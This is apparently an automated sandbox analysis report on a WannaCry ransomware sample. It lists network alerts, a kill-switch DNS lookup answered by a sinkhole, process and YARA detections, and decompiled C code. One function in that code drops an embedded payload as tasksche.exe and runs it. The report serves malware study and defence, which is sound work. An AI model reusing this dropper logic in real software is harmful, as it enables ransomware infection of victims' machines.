WS2_32.dll	closesocket, recv, send, htonl, ntohl, WSAStartup, inet_ntoa, ioctlsocket, select, htons, socket, connect, inet_addr
MSVCP60.dll	??1_Lockit@std@@QAE@XZ, ??0_Lockit@std@@QAE@XZ
iphlpapi.dll	GetAdaptersInfo, GetPerAdapterInfo
WININET.dll	InternetOpenA, InternetOpenUrlA, InternetCloseHandle
MSVCRT.dll	__set_app_type, _stricmp, __p__fmode, __p__commode, _except_handler3, __setusermatherr, _initterm, __getmainargs, _acmdln, _adjust_fdiv, _controlfp, exit, _XcptFilter, _exit, _onexit, __dllonexit, free, ??2@YAPAXI@Z, _ftol, sprintf, _endthreadex, strncpy, rand, _beginthreadex, __CxxFrameHandler, srand, time, __p___argc

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.78.8.8.859477532024291 10/12/22-06:23:13.693284	UDP	2024291	ET TROJAN Possible WannaCry DNS Lookup 1	59477	53	192.168.2.7	8.8.8.8
104.16.173.80192.168.2.780496992031515 10/12/22-06:23:12.540467	TCP	2031515	ET TROJAN Known Sinkhole Response Kryptos Logic	80	49699	104.16.173.80	192.168.2.7
192.168.2.7104.16.173.8049700802024298 10/12/22-06:23:13.761402	TCP	2024298	ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1	49700	80	192.168.2.7	104.16.173.80
192.168.2.7104.16.173.8049699802024298 10/12/22-06:23:12.511053	TCP	2024298	ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1	49699	80	192.168.2.7	104.16.173.80
104.16.173.80192.168.2.780497002031515 10/12/22-06:23:13.791210	TCP	2031515	ET TROJAN Known Sinkhole Response Kryptos Logic	80	49700	104.16.173.80	192.168.2.7

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 12, 2022 06:23:12.493108034 CEST	49699	80	192.168.2.7	104.16.173.80
Oct 12, 2022 06:23:12.510332108 CEST	80	49699	104.16.173.80	192.168.2.7
Oct 12, 2022 06:23:12.510427952 CEST	49699	80	192.168.2.7	104.16.173.80
Oct 12, 2022 06:23:12.511053085 CEST	49699	80	192.168.2.7	104.16.173.80
Oct 12, 2022 06:23:12.527982950 CEST	80	49699	104.16.173.80	192.168.2.7
Oct 12, 2022 06:23:12.540467024 CEST	80	49699	104.16.173.80	192.168.2.7
Oct 12, 2022 06:23:12.540509939 CEST	80	49699	104.16.173.80	192.168.2.7
Oct 12, 2022 06:23:12.540676117 CEST	49699	80	192.168.2.7	104.16.173.80
Oct 12, 2022 06:23:12.545087099 CEST	49699	80	192.168.2.7	104.16.173.80
Oct 12, 2022 06:23:12.562146902 CEST	80	49699	104.16.173.80	192.168.2.7
Oct 12, 2022 06:23:13.733834028 CEST	49700	80	192.168.2.7	104.16.173.80
Oct 12, 2022 06:23:13.751301050 CEST	80	49700	104.16.173.80	192.168.2.7
Oct 12, 2022 06:23:13.751434088 CEST	49700	80	192.168.2.7	104.16.173.80
Oct 12, 2022 06:23:13.761401892 CEST	49700	80	192.168.2.7	104.16.173.80
Oct 12, 2022 06:23:13.779067993 CEST	80	49700	104.16.173.80	192.168.2.7
Oct 12, 2022 06:23:13.791209936 CEST	80	49700	104.16.173.80	192.168.2.7
Oct 12, 2022 06:23:13.791358948 CEST	49700	80	192.168.2.7	104.16.173.80
Oct 12, 2022 06:23:13.791393995 CEST	80	49700	104.16.173.80	192.168.2.7
Oct 12, 2022 06:23:13.791551113 CEST	49700	80	192.168.2.7	104.16.173.80
Oct 12, 2022 06:23:13.793680906 CEST	49700	80	192.168.2.7	104.16.173.80
Oct 12, 2022 06:23:13.810925961 CEST	80	49700	104.16.173.80	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 12, 2022 06:23:12.410038948 CEST	59477	53	192.168.2.7	8.8.8.8
Oct 12, 2022 06:23:12.432110071 CEST	53	59477	8.8.8.8	192.168.2.7
Oct 12, 2022 06:23:13.693284035 CEST	59477	53	192.168.2.7	8.8.8.8
Oct 12, 2022 06:23:13.714802027 CEST	53	59477	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 12, 2022 06:23:12.410038948 CEST	192.168.2.7	8.8.8.8	0x256d	Standard query (0)	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com	A (IP address)	IN (0x0001)	false
Oct 12, 2022 06:23:13.693284035 CEST	192.168.2.7	8.8.8.8	0xf6ea	Standard query (0)	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 12, 2022 06:23:12.432110071 CEST	8.8.8.8	192.168.2.7	0x256d	No error (0)	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com	104.16.173.80	A (IP address)	IN (0x0001)	false
Oct 12, 2022 06:23:12.432110071 CEST	8.8.8.8	192.168.2.7	0x256d	No error (0)	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com	104.17.244.81	A (IP address)	IN (0x0001)	false
Oct 12, 2022 06:23:13.714802027 CEST	8.8.8.8	192.168.2.7	0xf6ea	No error (0)	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com	104.16.173.80	A (IP address)	IN (0x0001)	false
Oct 12, 2022 06:23:13.714802027 CEST	8.8.8.8	192.168.2.7	0xf6ea	No error (0)	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com	104.17.244.81	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49699	104.16.173.80	80	C:\Users\user\Desktop\MSNRf9dZ63.exe

Timestamp	kBytes transferred	Direction	Data
Oct 12, 2022 06:23:12.511053085 CEST	89	OUT	GET / HTTP/1.1 Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com Cache-Control: no-cache
Oct 12, 2022 06:23:12.540467024 CEST	89	IN	HTTP/1.1 200 OK Date: Wed, 12 Oct 2022 04:23:12 GMT Content-Type: text/html Content-Length: 607 Connection: close Server: cloudflare CF-RAY: 758d0f0f39c49b9e-FRA Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.7	49700	104.16.173.80	80	C:\Users\user\Desktop\MSNRf9dZ63.exe

Timestamp	kBytes transferred	Direction	Data
Oct 12, 2022 06:23:13.761401892 CEST	90	OUT	GET / HTTP/1.1 Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com Cache-Control: no-cache
Oct 12, 2022 06:23:13.791209936 CEST	91	IN	HTTP/1.1 200 OK Date: Wed, 12 Oct 2022 04:23:13 GMT Content-Type: text/html Content-Length: 607 Connection: close Server: cloudflare CF-RAY: 758d0f17080b9a15-FRA Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: MSNRf9dZ63.exePID: 4548, Parent PID: 3320

General

Target ID:	0
Start time:	06:23:11
Start date:	12/10/2022
Path:	C:\Users\user\Desktop\MSNRf9dZ63.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\MSNRf9dZ63.exe
Imagebase:	0x400000
File size:	6729728 bytes
MD5 hash:	1D38638153085A0A0F0A4F7174E52A9B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000002.256150268.000000000040F000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000000.247075924.000000000040F000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000000.00000002.256240785.0000000000710000.00000002.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000000.00000000.247147186.0000000000710000.00000002.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: MSNRf9dZ63.exePID: 4348, Parent PID: 552

General

Target ID:	1
Start time:	06:23:12
Start date:	12/10/2022
Path:	C:\Users\user\Desktop\MSNRf9dZ63.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\MSNRf9dZ63.exe -m security
Imagebase:	0x400000
File size:	6729728 bytes
MD5 hash:	1D38638153085A0A0F0A4F7174E52A9B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000000.249857244.000000000040F000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000002.252492927.000000000040F000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000001.00000002.252602471.0000000000710000.00000002.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000001.00000000.249931141.0000000000710000.00000002.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: tasksche.exePID: 5512, Parent PID: 4548

General

Target ID:	2
Start time:	06:23:13
Start date:	12/10/2022
Path:	C:\Windows\tasksche.exe
Wow64 process (32bit):	false
Commandline:	C:\WINDOWS\tasksche.exe /i
Imagebase:	0x400000
File size:	3514368 bytes
MD5 hash:	7F7CCAA16FB15EB1C7399D422F8363E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000002.00000000.252768487.000000000040E000.00000008.00000001.01000000.00000005.sdmp, Author: us-cert code analysis team Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp, Author: us-cert code analysis team Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\tasksche.exe, Author: Florian Roth (with the help of binar.ly) Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\tasksche.exe, Author: us-cert code analysis team Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\tasksche.exe, Author: ReversingLabs
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 98%, ReversingLabs Detection: 89%, Metadefender, Browse
Reputation:	moderate

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: MSNRf9dZ63.exePID: 4548, Parent PID: 3320COMMON

Executed Functions

Function 00407CE0 Relevance: 50.9, APIs: 18, Strings: 11, Instructions: 175
libraryloaderfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00407CE0() {
				void _v259;
				char _v260;
				void _v519;
				char _v520;
				struct _STARTUPINFOA _v588;
				struct _PROCESS_INFORMATION _v604;
				long _v608;
				_Unknown_base(*)()* _t36;
				void* _t38;
				void* _t39;
				void* _t50;
				int _t59;
				struct HINSTANCE__* _t104;
				struct HRSRC__* _t105;
				void* _t107;
				void* _t108;
				long _t109;
				intOrPtr _t121;
				intOrPtr _t122;

				_t104 = GetModuleHandleW(L"kernel32.dll");
				if(_t104 != 0) {
					 *0x431478 = GetProcAddress(_t104, "CreateProcessA");
					 *0x431458 = GetProcAddress(_t104, "CreateFileA");
					 *0x431460 = GetProcAddress(_t104, "WriteFile");
					_t36 = GetProcAddress(_t104, "CloseHandle");
					 *0x43144c = _t36;
					if( *0x431478 != 0) {
						_t121 =  *0x431458; // 0x772ef7b0
						if(_t121 != 0) {
							_t122 =  *0x431460; // 0x772efc30
							if(_t122 != 0 && _t36 != 0) {
								_t105 = FindResourceA(0, 0x727, "R");
								if(_t105 != 0) {
									_t38 = LoadResource(0, _t105);
									if(_t38 != 0) {
										_t39 = LockResource(_t38);
										_v608 = _t39;
										if(_t39 != 0) {
											_t109 = SizeofResource(0, _t105);
											if(_t109 != 0) {
												_v520 = 0;
												memset( &_v519, 0, 0x40 << 2);
												asm("stosw");
												asm("stosb");
												_v260 = 0;
												memset( &_v259, 0, 0x40 << 2);
												asm("stosw");
												asm("stosb");
												sprintf( &_v520, "C:\\%s\\%s", "WINDOWS", "tasksche.exe");
												sprintf( &_v260, "C:\\%s\\qeriuwjhrf", "WINDOWS");
												MoveFileExA( &_v520,  &_v260, 1); // executed
												_t50 = CreateFileA( &_v520, 0x40000000, 0, 0, 2, 4, 0); // executed
												_t107 = _t50;
												if(_t107 != 0xffffffff) {
													WriteFile(_t107, _v608, _t109,  &_v608, 0); // executed
													FindCloseChangeNotification(_t107); // executed
													_v604.hThread = 0;
													_v604.dwProcessId = 0;
													_v604.dwThreadId = 0;
													memset( &(_v588.lpReserved), 0, 0x10 << 2);
													asm("repne scasb");
													_v604.hProcess = 0;
													_t108 = " /i";
													asm("repne scasb");
													memcpy( &_v520 - 1, _t108, 0 << 2);
													memcpy(_t108 + 0x175b75a, _t108, 0);
													_v588.cb = 0x44;
													_v588.wShowWindow = 0;
													_v588.dwFlags = 0x81;
													_t59 = CreateProcessA(0,  &_v520, 0, 0, 0, 0x8000000, 0, 0,  &_v588,  &_v604); // executed
													if(_t59 != 0) {
														CloseHandle(_v604.hThread);
														CloseHandle(_v604);
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return 0;
			}

0x00407cf5
0x00407cfb
0x00407d15
0x00407d22
0x00407d2f
0x00407d34
0x00407d3c
0x00407d43
0x00407d49
0x00407d4f
0x00407d55
0x00407d5b
0x00407d7a
0x00407d7e
0x00407d86
0x00407d8e
0x00407d95
0x00407d9d
0x00407da1
0x00407daf
0x00407db3
0x00407dc4
0x00407dc8
0x00407dca
0x00407dcc
0x00407ddb
0x00407de2
0x00407def
0x00407df1
0x00407e01
0x00407e18
0x00407e2c
0x00407e43
0x00407e49
0x00407e4e
0x00407e61
0x00407e68
0x00407e72
0x00407e7a
0x00407e82
0x00407e8b
0x00407e95
0x00407e9b
0x00407e9f
0x00407ea8
0x00407eb0
0x00407ebc
0x00407ed3
0x00407edb
0x00407ee0
0x00407ee8
0x00407ef0
0x00407ef7
0x00407f02
0x00407f02
0x00407ef0
0x00407e4e
0x00407db3
0x00407da1
0x00407d8e
0x00407d7e
0x00407d5b
0x00407d4f
0x00407d43
0x00407f14

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,00000000,6FFDFB10,?,00000000), ref: 00407CEF
GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 00407D0D
GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00407D1A
GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00407D27
GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00407D34
FindResourceA.KERNEL32(00000000,00000727,0043137C), ref: 00407D74
LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407D86
LockResource.KERNEL32(00000000,?,00000000), ref: 00407D95
SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407DA9
sprintf.MSVCRT ref: 00407E01
sprintf.MSVCRT ref: 00407E18
MoveFileExA.KERNEL32 ref: 00407E2C
CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000004,00000000), ref: 00407E43
WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00407E61
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00407E68
CreateProcessA.KERNELBASE ref: 00407EE8
CloseHandle.KERNEL32(00000000), ref: 00407EF7
CloseHandle.KERNEL32(08000000), ref: 00407F02

Strings

C:\%s\%s, xrefs: 00407DFB
C:\%s\qeriuwjhrf, xrefs: 00407E12
D, xrefs: 00407ED3
WINDOWS, xrefs: 00407DF2, 00407E0D
CloseHandle, xrefs: 00407D29
tasksche.exe, xrefs: 00407DEA
CreateProcessA, xrefs: 00407D07
WriteFile, xrefs: 00407D1C
CreateFileA, xrefs: 00407D0F
/i, xrefs: 00407E8D
kernel32.dll, xrefs: 00407CEA

Memory Dump Source

Source File: 00000000.00000002.256054234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.256042958.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256121575.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256130271.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256150268.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256194844.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256240785.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: AddressProcResource$CloseFileHandle$CreateFindsprintf$ChangeLoadLockModuleMoveNotificationProcessSizeofWrite
String ID: /i$C:\%s\%s$C:\%s\qeriuwjhrf$CloseHandle$CreateFileA$CreateProcessA$D$WINDOWS$WriteFile$kernel32.dll$tasksche.exe
API String ID: 1541710770-1507730452
Opcode ID: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
Instruction ID: 13a48b3e7e70fc1f7524b3ea2ca00aec236584d0bbebcf852995d03268f4a9c8
Opcode Fuzzy Hash: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
Instruction Fuzzy Hash: B15197715043496FE7109F74DC84AAB7B98EB88354F14493EF651A32E0DA7898088BAA

Uniqueness

Uniqueness Score: -1.00%

Function 00409A16 Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 71%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x40a1a0);
				_push(0x409ba2);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x70f894 =  *0x70f894 | 0xffffffff;
				 *0x70f898 =  *0x70f898 | 0xffffffff;
				 *(__p__fmode()) =  *0x70f88c;
				 *(__p__commode()) =  *0x70f888;
				 *0x70f890 = _adjust_fdiv;
				_t27 = E00409BA1( *_adjust_fdiv);
				_t61 =  *0x431410; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E00409B9E);
				}
				E00409B8C(_t27);
				_push(0x40b010);
				_push(0x40b00c);
				L00409B86();
				_v112 =  *0x70f884;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
				_push(0x40b008);
				_push(0x40b000); // executed
				L00409B86(); // executed
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_push(_t38);
				_push(_t55);
				_push(0);
				_push(GetModuleHandleA(0));
				_t40 = E00408140();
				_v108 = _t40;
				exit(_t40); // executed
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L00409B80();
				return _t41;
			}

0x00409a19
0x00409a1b
0x00409a20
0x00409a2b
0x00409a2c
0x00409a39
0x00409a3e
0x00409a43
0x00409a4a
0x00409a51
0x00409a64
0x00409a72
0x00409a7b
0x00409a80
0x00409a85
0x00409a8b
0x00409a92
0x00409a98
0x00409a99
0x00409a9e
0x00409aa3
0x00409aa8
0x00409ab2
0x00409acb
0x00409ad1
0x00409ad6
0x00409adb
0x00409ae8
0x00409aea
0x00409af0
0x00409b2c
0x00409b31
0x00409b32
0x00409b32
0x00409af2
0x00409af2
0x00409af2
0x00409af3
0x00409af6
0x00409af8
0x00409b03
0x00409b05
0x00409b05
0x00409b06
0x00409b06
0x00409b03
0x00409b09
0x00409b0d
0x00000000
0x00000000
0x00409b13
0x00409b1a
0x00409b24
0x00409b39
0x00409b26
0x00409b26
0x00409b26
0x00409b3a
0x00409b3b
0x00409b3c
0x00409b44
0x00409b45
0x00409b4a
0x00409b4e
0x00409b54
0x00409b59
0x00409b5b
0x00409b5e
0x00409b5f
0x00409b60
0x00409b67

APIs

__set_app_type.MSVCRT ref: 00409A43
__p__fmode.MSVCRT ref: 00409A58
__p__commode.MSVCRT ref: 00409A66
__setusermatherr.MSVCRT ref: 00409A92
_initterm.MSVCRT ref: 00409AA8
__getmainargs.MSVCRT ref: 00409ACB
_initterm.MSVCRT ref: 00409ADB
GetStartupInfoA.KERNEL32(?), ref: 00409B1A
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00409B3E
exit.KERNELBASE ref: 00409B4E
_XcptFilter.MSVCRT ref: 00409B60

Memory Dump Source

Source File: 00000000.00000002.256054234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.256042958.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256121575.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256130271.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256150268.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
